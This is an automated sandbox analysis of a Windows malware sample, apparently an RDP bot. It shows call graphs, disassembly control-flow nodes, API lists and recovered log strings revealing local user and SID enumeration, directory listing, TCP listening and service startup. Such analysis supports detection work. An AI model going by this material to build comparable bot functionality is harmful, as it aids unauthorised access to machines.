LeaveCriticalSection 62186->62189 62190 7ffe133063b1 LeaveCriticalSection 62187->62190 62192 7ffe13306398 GetProcessHeap HeapFree 62187->62192 62188->62182 62188->62184 62188->62185 62188->62186 62188->62189 62193 7ffe13306212 62188->62193 62195 7ffe13306208 62188->62195 62209 7ffe13309a80 GetSystemTimeAsFileTime 62188->62209 62189->62188 62192->62187 62194 7ffe1330a202 12 API calls 62193->62194 62196 7ffe1330632b EnterCriticalSection 62194->62196 62210 7ffe13309a80 GetSystemTimeAsFileTime 62195->62210 62199 7ffe13301d6c 62198->62199 62200 7ffe13301ce8 62198->62200 62201 7ffe1330a202 12 API calls 62199->62201 62200->62199 62202 7ffe13301ced 62200->62202 62205 7ffe13301d40 62201->62205 62203 7ffe13301cf6 send 62202->62203 62206 7ffe13301d39 62202->62206 62203->62202 62204 7ffe13301d1a WSAGetLastError 62203->62204 62207 7ffe1330a202 12 API calls 62204->62207 62205->62181 62206->62205 62208 7ffe1330a202 12 API calls 62206->62208 62207->62206 62208->62205 62209->62188 62210->62193 62211 7ffe0e163c88 62242 7ffe0e1638c3 62211->62242 62212 7ffe0e163cd7 wcslen GetProcessHeap HeapAlloc 62212->62242 62213 7ffe0e163d97 NetApiBufferFree 62215 7ffe0e163d87 62213->62215 62214 7ffe0e161292 6 API calls 62214->62242 62215->62213 62216 7ffe0e163ed7 62215->62216 62218 7ffe0e163dba NetUserEnum 62215->62218 62226 7ffe0e163e36 GetProcessHeap HeapAlloc 62215->62226 62223 7ffe0e161292 6 API calls 62216->62223 62238 7ffe0e163ee0 62216->62238 62217 7ffe0e163d48 GetProcessHeap HeapAlloc 62219 7ffe0e163d6c 62217->62219 62217->62242 62218->62215 62221 7ffe0e161292 6 API calls 62219->62221 62219->62242 62220 7ffe0e1638ee LocalAlloc 62220->62242 62221->62219 62222 7ffe0e164014 62224 7ffe0e161292 6 API calls 62222->62224 62223->62238 62227 7ffe0e163f0a 62224->62227 62225 7ffe0e16379f 8 API calls 62228 7ffe0e163eed 62225->62228 62229 7ffe0e1638a3 62226->62229 62230 7ffe0e163e70 62226->62230 62233 7ffe0e161292 6 API calls 62228->62233 62229->62215 62232 7ffe0e161292 6 API calls 62229->62232 62234 7ffe0e163eb5 62230->62234 62235 7ffe0e163e7c memcpy GetProcessHeap HeapFree 62230->62235 62231 7ffe0e16390d wcsncpy 62254 7ffe0e16a05a 62231->62254 62232->62229 62233->62227 62235->62234 62237 7ffe0e163ee8 62237->62225 62238->62222 62238->62237 62240 7ffe0e1639de GetLastError 62241 7ffe0e163a01 LocalAlloc 62240->62241 62240->62242 62247 7ffe0e163a1f LookupAccountNameW 62241->62247 62248 7ffe0e163b7a 62241->62248 62242->62212 62242->62214 62242->62215 62242->62217 62242->62220 62242->62231 62243 7ffe0e163995 GetLastError 62242->62243 62244 7ffe0e163b84 ConvertSidToStringSidA 62242->62244 62245 7ffe0e161292 6 API calls 62243->62245 62244->62242 62246 7ffe0e163bd5 GetLastError 62244->62246 62245->62242 62251 7ffe0e161292 6 API calls 62246->62251 62249 7ffe0e163a53 LocalFree 62247->62249 62250 7ffe0e163a61 GetLastError 62247->62250 62248->62244 62249->62242 62252 7ffe0e161292 6 API calls 62250->62252 62251->62242 62253 7ffe0e163a7f 62252->62253 62253->62249 62255 7ffe0e16a082 wcslen 62254->62255 62256 7ffe0e163937 LookupAccountNameW 62254->62256 62255->62256 62256->62240 62256->62242 62257 7ffe133063cb 62275 7ffe133063db 62257->62275 62258 7ffe133065ed 62262 7ffe133065f3 62258->62262 62337 7ffe133014c5 16 API calls 62258->62337 62263 7ffe1330640b Sleep 62263->62275 62264 7ffe1330a202 12 API calls 62264->62275 62267 7ffe133014c5 16 API calls 62267->62275 62269 7ffe133064b6 GetProcessHeap HeapAlloc 62270 7ffe133064dc CreateThread 62269->62270 62269->62275 62271 7ffe133065a0 GetLastError 62270->62271 62272 7ffe1330651f EnterCriticalSection 62270->62272 62273 7ffe1330a202 12 API calls 62271->62273 62274 7ffe1330653f 62272->62274 62273->62275 62274->62274 62276 7ffe13306546 LeaveCriticalSection 62274->62276 62275->62258 62275->62263 62275->62264 62275->62267 62275->62269 62278 7ffe133065d1 GetProcessHeap HeapFree 62275->62278 62279 7ffe133015fa socket 62275->62279 62297 7ffe133013f9 62275->62297 62303 7ffe13301344 setsockopt 62275->62303 62310 7ffe133019d9 62275->62310 62333 7ffe1330152a setsockopt 62275->62333 62277 7ffe1330a202 12 API calls 62276->62277 62277->62275 62278->62275 62280 7ffe1330162b 62279->62280 62281 7ffe13301702 WSAGetLastError 62279->62281 62283 7ffe1330152a 14 API calls 62280->62283 62282 7ffe1330a202 12 API calls 62281->62282 62284 7ffe13301726 62282->62284 62285 7ffe13301638 62283->62285 62288 7ffe1330a202 12 API calls 62284->62288 62292 7ffe133016f9 62284->62292 62286 7ffe133016f1 62285->62286 62287 7ffe13301641 htonl htons bind 62285->62287 62338 7ffe133014c5 16 API calls 62286->62338 62289 7ffe133016c4 WSAGetLastError 62287->62289 62290 7ffe13301681 listen 62287->62290 62288->62292 62294 7ffe1330a202 12 API calls 62289->62294 62290->62284 62293 7ffe1330169a WSAGetLastError 62290->62293 62292->62275 62295 7ffe1330a202 12 API calls 62293->62295 62296 7ffe133016c2 62294->62296 62295->62296 62296->62284 62296->62286 62298 7ffe13301409 ioctlsocket 62297->62298 62300 7ffe1330143d WSAGetLastError 62298->62300 62301 7ffe1330142c 62298->62301 62302 7ffe1330a202 12 API calls 62300->62302 62301->62275 62302->62301 62304 7ffe13301379 setsockopt 62303->62304 62305 7ffe133013d4 WSAGetLastError 62303->62305 62306 7ffe133013a5 62304->62306 62307 7ffe133013af WSAGetLastError 62304->62307 62308 7ffe1330a202 12 API calls 62305->62308 62306->62275 62309 7ffe1330a202 12 API calls 62307->62309 62308->62306 62309->62306 62311 7ffe13301a98 accept 62310->62311 62312 7ffe13301a04 62310->62312 62313 7ffe13301bda WSAGetLastError 62311->62313 62314 7ffe13301abe 62311->62314 62315 7ffe133013f9 14 API calls 62312->62315 62318 7ffe1330a202 12 API calls 62313->62318 62316 7ffe133013f9 14 API calls 62314->62316 62317 7ffe13301a0e 62315->62317 62319 7ffe13301acb 62316->62319 62320 7ffe13301a13 62317->62320 62321 7ffe13301a2e select 62317->62321 62318->62320 62322 7ffe13301bc6 62319->62322 62323 7ffe13301ad4 htonl htons 62319->62323 62320->62275 62324 7ffe13301a92 62321->62324 62326 7ffe13301b69 62321->62326 62339 7ffe133014c5 16 API calls 62322->62339 62330 7ffe13301af7 62323->62330 62324->62311 62327 7ffe13301b93 WSAGetLastError 62324->62327 62328 7ffe1330a202 12 API calls 62326->62328 62331 7ffe1330a202 12 API calls 62327->62331 62328->62320 62332 7ffe1330a202 12 API calls 62330->62332 62331->62320 62332->62320 62334 7ffe13301567 62333->62334 62335 7ffe13301571 WSAGetLastError 62333->62335 62334->62275 62336 7ffe1330a202 12 API calls 62335->62336 62336->62334 62337->62262 62338->62292 62339->62320 62340 7ffe1330660a 62343 7ffe1330661c 62340->62343 62341 7ffe133067a6 62343->62341 62344 7ffe1330665d Sleep SleepEx 62343->62344 62345 7ffe133066ef GetProcessHeap HeapAlloc 62343->62345 62353 7ffe13301c0a 62343->62353 62344->62343 62346 7ffe13306716 memcpy 62345->62346 62350 7ffe1330667a 62345->62350 62348 7ffe1330a202 12 API calls 62346->62348 62347 7ffe1330a202 12 API calls 62347->62350 62349 7ffe13306776 EnterCriticalSection 62348->62349 62349->62350 62350->62343 62350->62347 62350->62350 62351 7ffe133066c4 memcpy 62350->62351 62352 7ffe133066ae LeaveCriticalSection 62350->62352 62351->62343 62352->62350 62354 7ffe13301c98 62353->62354 62355 7ffe13301c24 62353->62355 62356 7ffe1330a202 12 API calls 62354->62356 62355->62354 62357 7ffe13301c29 recv 62355->62357 62363 7ffe13301c43 62356->62363 62358 7ffe13301c4c WSAGetLastError 62357->62358 62359 7ffe13301c3f 62357->62359 62360 7ffe13301c60 62358->62360 62358->62363 62361 7ffe1330a202 12 API calls 62359->62361 62359->62363 62362 7ffe1330a202 12 API calls 62360->62362 62361->62363 62362->62363 62363->62343 62364 7ffe133067c4 62375 7ffe133067d0 62364->62375 62365 7ffe13306869 EnterCriticalSection 62365->62375 62366 7ffe133068c1 EnterCriticalSection 62367 7ffe133068ce 62366->62367 62368 7ffe133068da WaitForSingleObject 62367->62368 62369 7ffe13306929 LeaveCriticalSection 62367->62369 62374 7ffe13306910 GetProcessHeap HeapFree 62367->62374 62380 7ffe133014c5 16 API calls 62368->62380 62370 7ffe133067f6 LeaveCriticalSection 62372 7ffe133068b4 Sleep SleepEx 62370->62372 62370->62375 62372->62366 62373 7ffe1330a202 12 API calls 62376 7ffe13306823 WaitForSingleObject 62373->62376 62374->62367 62375->62365 62375->62366 62375->62370 62375->62373 62378 7ffe13306848 GetProcessHeap HeapFree 62375->62378 62379 7ffe133014c5 16 API calls 62376->62379 62378->62375 62379->62375 62380->62367

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 799 7ffe0e1638c3-7ffe0e1638d9 call 7ffe0e161292 802 7ffe0e163d3e-7ffe0e163d42 799->802 803 7ffe0e1638de 802->803 804 7ffe0e163d48-7ffe0e163d66 GetProcessHeap HeapAlloc 802->804 805 7ffe0e1638e3-7ffe0e1638e8 803->805 804->805 806 7ffe0e163d6c-7ffe0e163d82 call 7ffe0e161292 804->806 807 7ffe0e1639d4-7ffe0e1639d9 805->807 808 7ffe0e1638ee-7ffe0e1638fe LocalAlloc 805->808 806->805 810 7ffe0e163902-7ffe0e163907 807->810 808->810 812 7ffe0e16390d-7ffe0e16398b wcsncpy call 7ffe0e16a05a LookupAccountNameW 810->812 813 7ffe0e163cb9 810->813 821 7ffe0e1639de-7ffe0e1639ea GetLastError 812->821 822 7ffe0e16398d-7ffe0e16398f 812->822 814 7ffe0e163cbe-7ffe0e163cc9 813->814 816 7ffe0e163ccf-7ffe0e163cd1 814->816 817 7ffe0e163d87 814->817 816->817 820 7ffe0e163cd7-7ffe0e163d38 wcslen GetProcessHeap HeapAlloc 816->820 819 7ffe0e163d8d-7ffe0e163d95 817->819 823 7ffe0e163d9c-7ffe0e163dac 819->823 824 7ffe0e163d97 NetApiBufferFree 819->824 820->799 820->802 825 7ffe0e163a01-7ffe0e163a19 LocalAlloc 821->825 826 7ffe0e1639ec-7ffe0e1639ff call 7ffe0e161292 821->826 827 7ffe0e163995-7ffe0e1639b6 GetLastError call 7ffe0e161292 822->827 828 7ffe0e163b84-7ffe0e163b9c ConvertSidToStringSidA 822->828 830 7ffe0e163db2-7ffe0e163db4 823->830 831 7ffe0e163ed7-7ffe0e163ede 823->831 824->823 835 7ffe0e163a1f-7ffe0e163a51 LookupAccountNameW 825->835 836 7ffe0e163b7a 825->836 826->827 847 7ffe0e163bfb-7ffe0e163c01 827->847 848 7ffe0e1639bc 827->848 833 7ffe0e163bd5-7ffe0e163bf9 GetLastError call 7ffe0e161292 828->833 834 7ffe0e163b9e-7ffe0e163ba5 828->834 830->831 838 7ffe0e163dba-7ffe0e163e24 NetUserEnum 830->838 845 7ffe0e163ee0-7ffe0e163ee2 831->845 846 7ffe0e163f1d-7ffe0e163f36 call 7ffe0e161292 831->846 833->834 840 7ffe0e163c81-7ffe0e163c86 834->840 841 7ffe0e163bab-7ffe0e163bd0 call 7ffe0e161292 834->841 842 7ffe0e163a53-7ffe0e163a5c LocalFree 835->842 843 7ffe0e163a61-7ffe0e163a82 GetLastError call 7ffe0e161292 835->843 836->828 838->819 849 7ffe0e163e2a-7ffe0e163e30 838->849 840->814 841->814 842->822 874 7ffe0e163a84 843->874 875 7ffe0e163a9c-7ffe0e163aa2 843->875 853 7ffe0e16402a-7ffe0e164044 call 7ffe0e161292 845->853 854 7ffe0e163ee8-7ffe0e163f05 call 7ffe0e16379f call 7ffe0e161292 845->854 868 7ffe0e163f57-7ffe0e163f5d 846->868 869 7ffe0e163f38 846->869 864 7ffe0e163c8f-7ffe0e163c94 847->864 865 7ffe0e163c07-7ffe0e163c0d 847->865 858 7ffe0e1639c2-7ffe0e163c6a 848->858 859 7ffe0e163c7a-7ffe0e163c7f 848->859 849->819 861 7ffe0e163e36-7ffe0e163e6a GetProcessHeap HeapAlloc 849->861 883 7ffe0e163f0a-7ffe0e163f1c 853->883 854->883 858->814 859->814 872 7ffe0e1638a3-7ffe0e1638be call 7ffe0e161292 861->872 873 7ffe0e163e70-7ffe0e163e7a 861->873 864->814 866 7ffe0e163c0f-7ffe0e163c15 865->866 867 7ffe0e163c39-7ffe0e163c3c 865->867 877 7ffe0e163cab-7ffe0e163cb0 866->877 878 7ffe0e163c1b-7ffe0e163c21 866->878 884 7ffe0e163c4f-7ffe0e163c55 867->884 885 7ffe0e163c3e-7ffe0e163c41 867->885 886 7ffe0e163f63 868->886 887 7ffe0e163fec 868->887 881 7ffe0e163fe2-7ffe0e163fe7 869->881 882 7ffe0e163f3e-7ffe0e163f4b 869->882 872->819 890 7ffe0e163eb5-7ffe0e163ed2 873->890 891 7ffe0e163e7c-7ffe0e163eaf memcpy GetProcessHeap HeapFree 873->891 892 7ffe0e163b20-7ffe0e163b25 874->892 893 7ffe0e163a8a-7ffe0e163a97 874->893 879 7ffe0e163b34-7ffe0e163b39 875->879 880 7ffe0e163aa8-7ffe0e163aae 875->880 877->814 895 7ffe0e163cb2-7ffe0e163cb7 878->895 896 7ffe0e163c27-7ffe0e163c2d 878->896 879->842 897 7ffe0e163ae0-7ffe0e163ae6 880->897 898 7ffe0e163ab0-7ffe0e163ab3 880->898 881->854 882->868 901 7ffe0e163ca4-7ffe0e163ca9 884->901 902 7ffe0e163c57-7ffe0e163c5c 884->902 899 7ffe0e163c43-7ffe0e163c46 885->899 900 7ffe0e163c96-7ffe0e163c9b 885->900 903 7ffe0e163f65-7ffe0e163f68 886->903 904 7ffe0e163f98-7ffe0e163f9e 886->904 909 7ffe0e163ff6-7ffe0e163ffb 887->909 891->890 892->842 893->875 895->814 905 7ffe0e163c2f-7ffe0e163c34 896->905 906 7ffe0e163c5e-7ffe0e163c63 896->906 912 7ffe0e163b5c-7ffe0e163b61 897->912 913 7ffe0e163ae8-7ffe0e163aee 897->913 907 7ffe0e163ab5-7ffe0e163ab8 898->907 908 7ffe0e163ace-7ffe0e163ad4 898->908 910 7ffe0e163c9d-7ffe0e163ca2 899->910 911 7ffe0e163c48-7ffe0e163c4d 899->911 900->814 901->814 902->814 914 7ffe0e163f6a-7ffe0e163f6d 903->914 915 7ffe0e163f86-7ffe0e163f8c 903->915 916 7ffe0e164014 904->916 917 7ffe0e163fa0-7ffe0e163fa6 904->917 905->814 906->814 918 7ffe0e163b3e-7ffe0e163b43 907->918 919 7ffe0e163abe-7ffe0e163ac1 907->919 920 7ffe0e163b52-7ffe0e163b57 908->920 921 7ffe0e163ad6-7ffe0e163adb 908->921 909->854 910->814 911->814 912->842 922 7ffe0e163af0-7ffe0e163af6 913->922 923 7ffe0e163b66-7ffe0e163b6b 913->923 914->909 924 7ffe0e163f73-7ffe0e163f76 914->924 925 7ffe0e163f8e-7ffe0e163f93 915->925 926 7ffe0e16400a-7ffe0e16400f 915->926 927 7ffe0e16401e 916->927 917->927 928 7ffe0e163fa8-7ffe0e163fae 917->928 918->842 929 7ffe0e163ac7-7ffe0e163acc 919->929 930 7ffe0e163b48-7ffe0e163b4d 919->930 920->842 921->842 931 7ffe0e163b70-7ffe0e163b75 922->931 932 7ffe0e163af8-7ffe0e163afd 922->932 923->842 933 7ffe0e164000-7ffe0e164005 924->933 934 7ffe0e163f7c-7ffe0e163f81 924->934 925->854 926->854 927->853 935 7ffe0e163fb0-7ffe0e163fb5 928->935 936 7ffe0e163fba-7ffe0e163fbf 928->936 929->842 930->842 931->842 932->842 933->854 934->854 935->854 936->854
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd
                                                                    Similarity
                                                                    • API ID: AllocErrorLastLocal$AccountCriticalHeapLookupNameSection$CopyEnterFileFreeLeaveProcessfflushfwritewcsncpy
                                                                    • String ID: D$[D] (%s) -> User found(name=%s,s_sid=%s,acct_expires=%x,last_logon=%x)$[E] (%s) -> ConvertSidToStringSid failed(gle=%lu)$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$sid_to_str$users_sync
                                                                    • API String ID: 3624467404-104752423
                                                                    • Opcode ID: 77f039575536de71df0d3d15065c23e897c673814d0f2d56dbe4c0034cf1c5e9
                                                                    • Instruction ID: b4581d078a970d0cd9a5627759c46edfbd6e021621805fcb8e1c62a1cddd1150
                                                                    • Opcode Fuzzy Hash: 77f039575536de71df0d3d15065c23e897c673814d0f2d56dbe4c0034cf1c5e9
                                                                    • Instruction Fuzzy Hash: 9DF14862A0CA0386FB608B24E44437963A2EBC4B54F654037D9EE477BADF3DE849D741
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strlen$Heap_mbscpy$AllocFreeHandleLibraryModuleProcess
                                                                    • String ID: [E] (%s) -> Failed(name=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(name=%s)$[I] (%s) -> Loaded(f_path=%s)$mem_alloc$unit_cleanup$unit_init$units_init
                                                                    • API String ID: 548194777-214984806
                                                                    • Opcode ID: 47819f1301a992ae7be7bbe4044968ff8155d3b3116fb4ff4251830b2711549d
                                                                    • Instruction ID: ea40a60f4ba252cc1da0bdb733ae47b6ce6584feeff21e6d69645754e0b08120
                                                                    • Opcode Fuzzy Hash: 47819f1301a992ae7be7bbe4044968ff8155d3b3116fb4ff4251830b2711549d
                                                                    • Instruction Fuzzy Hash: A3815D61B08643A1FB219B99E4517B973A1EF44B84F444635EB4D8B7B5EF3CE90AC380
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Find$ErrorFileLast$CloseFirstNextfflushfwritestrcpy
                                                                    • String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
                                                                    • API String ID: 4253334766-243243391
                                                                    • Opcode ID: ae06295473735462a982a09cf62c5e0a22a1fade5743064b87b26a330f433d8f
                                                                    • Instruction ID: 891903754cc5a00e15ca284753bd99bc89011566fcfb3e570f3b851e1414f7f6
                                                                    • Opcode Fuzzy Hash: ae06295473735462a982a09cf62c5e0a22a1fade5743064b87b26a330f433d8f
                                                                    • Instruction Fuzzy Hash: BA614C21E1C64786FB309F99A4443F92660AF51794F544232D8FE5B2F8FE7CA9448F81
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Find$ErrorFileLast$CloseFirstNext_mbscpyfflushfwrite
                                                                    • String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
                                                                    • API String ID: 1094913617-243243391
                                                                    • Opcode ID: 4479868d61843783ce57a0bb4d40878a2ad77d6bec23207d6b7c491633aae95a
                                                                    • Instruction ID: cc370ea7fbef0c1cd4cf836caab0060818f6563c79cb632844c2725ddf2a286a
                                                                    • Opcode Fuzzy Hash: 4479868d61843783ce57a0bb4d40878a2ad77d6bec23207d6b7c491633aae95a
                                                                    • Instruction Fuzzy Hash: 4B611622E0D653A5FA60979CA4083B87350AF10B59F944732FB5ECB2F1DF6DA94583C1
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Free$Process$Local$AllocBufferEnumUsermemcpy
                                                                    • String ID: [E] (%s) -> Failed(err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> NetUserEnum failed(enum_err=%08lx)$[I] (%s) -> Done(sam_user_num=%u)$mem_alloc$users_sync
                                                                    • API String ID: 1361071942-3382179125
                                                                    • Opcode ID: d8706a7d902b59c164108d338cbc47857dc36c1991d74cbb9efb23a04b1550c3
                                                                    • Instruction ID: dc138e19946267911f03a8b187d85b881c0a002bc9e3293308c104569fd147ad
                                                                    • Opcode Fuzzy Hash: d8706a7d902b59c164108d338cbc47857dc36c1991d74cbb9efb23a04b1550c3
                                                                    • Instruction Fuzzy Hash: 5661B422A0C60795FA209B54F8403BD6361AFC5B54F640137D9EE076F2EE3EE889C311
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$bindfflushfwritehtonlhtonslistensetsockoptsocket
                                                                    • String ID: [E] (%s) -> bind failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> listen failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$tcp_listen
                                                                    • API String ID: 3590747132-3524496754
                                                                    • Opcode ID: 82738d66b74231e1c411ebf19cae2bd0d8602a741a7f23217e1e0b4753f74ced
                                                                    • Instruction ID: ee66d7c783ada8c997f8c866237170b8a69717bb8a2771e549591790edc0fe2e
                                                                    • Opcode Fuzzy Hash: 82738d66b74231e1c411ebf19cae2bd0d8602a741a7f23217e1e0b4753f74ced
                                                                    • Instruction Fuzzy Hash: 3A319565E08E06CAE6149B27A8045B9A290BF65BF4F041375E97E637F6DE3CE4058708
                                                                    APIs
                                                                    • strcmp.MSVCRT ref: 00007FF6BFD68C62
                                                                    • strcmp.MSVCRT ref: 00007FF6BFD68C75
                                                                    • StartServiceCtrlDispatcherA.ADVAPI32 ref: 00007FF6BFD68CB1
                                                                    • _read.MSVCRT ref: 00007FF6BFD68D07
                                                                    • GetLastError.KERNEL32 ref: 00007FF6BFD68D26
                                                                      • Part of subcall function 00007FF6BFD688EE: FreeLibrary.KERNEL32(?,?,00000000,0000013B444313D0,00007FF6BFD68CDE,?,?,?,?,?,?,00000001,00007FF6BFD68E4A,?,?,00007FF6BFD784F8), ref: 00007FF6BFD6892F
                                                                      • Part of subcall function 00007FF6BFD688EE: GetProcessHeap.KERNEL32(?,?,00000000,0000013B444313D0,00007FF6BFD68CDE,?,?,?,?,?,?,00000001,00007FF6BFD68E4A,?,?,00007FF6BFD784F8), ref: 00007FF6BFD68962
                                                                      • Part of subcall function 00007FF6BFD688EE: HeapFree.KERNEL32(?,?,00000000,0000013B444313D0,00007FF6BFD68CDE,?,?,?,?,?,?,00000001,00007FF6BFD68E4A,?,?,00007FF6BFD784F8), ref: 00007FF6BFD68973
                                                                      • Part of subcall function 00007FF6BFD689AA: GetProcessHeap.KERNEL32(?,?,00000000,00007FF6BFD68CE3,?,?,?,?,?,?,00000001,00007FF6BFD68E4A,?,?,00007FF6BFD784F8,00000000), ref: 00007FF6BFD689DB
                                                                      • Part of subcall function 00007FF6BFD689AA: HeapFree.KERNEL32(?,?,00000000,00007FF6BFD68CE3,?,?,?,?,?,?,00000001,00007FF6BFD68E4A,?,?,00007FF6BFD784F8,00000000), ref: 00007FF6BFD689EC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Free$Processstrcmp$CtrlDispatcherErrorLastLibraryServiceStart_read
